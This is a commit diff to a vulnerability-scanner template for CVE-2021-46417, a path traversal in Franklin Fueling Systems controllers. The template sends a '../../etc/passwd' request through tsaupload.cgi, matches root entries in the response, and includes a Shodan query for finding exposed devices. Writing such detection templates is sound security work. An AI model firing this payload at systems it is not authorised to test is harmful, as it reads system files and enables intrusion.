Update CVE-2021-46417.yaml
parent
006c2e71e0
commit
208f676590
|
@ -5,27 +5,24 @@ info:
|
|||
author: For3stCo1d
|
||||
severity: high
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
|
||||
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
|
||||
metadata:
|
||||
shodan-query: "Franklin Fueling Systems"
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-46417
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: http.html:"Franklin Fueling Systems"
|
||||
tags: cve,cve2021,franklinfueling,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="
|
||||
- "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
- type: regex
|
||||
part: body
|
||||
words:
|
||||
- "root:"
|
||||
- "/bin/sh"
|
||||
- "user:"
|
||||
condition: and
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
Loading…
Reference in New Issue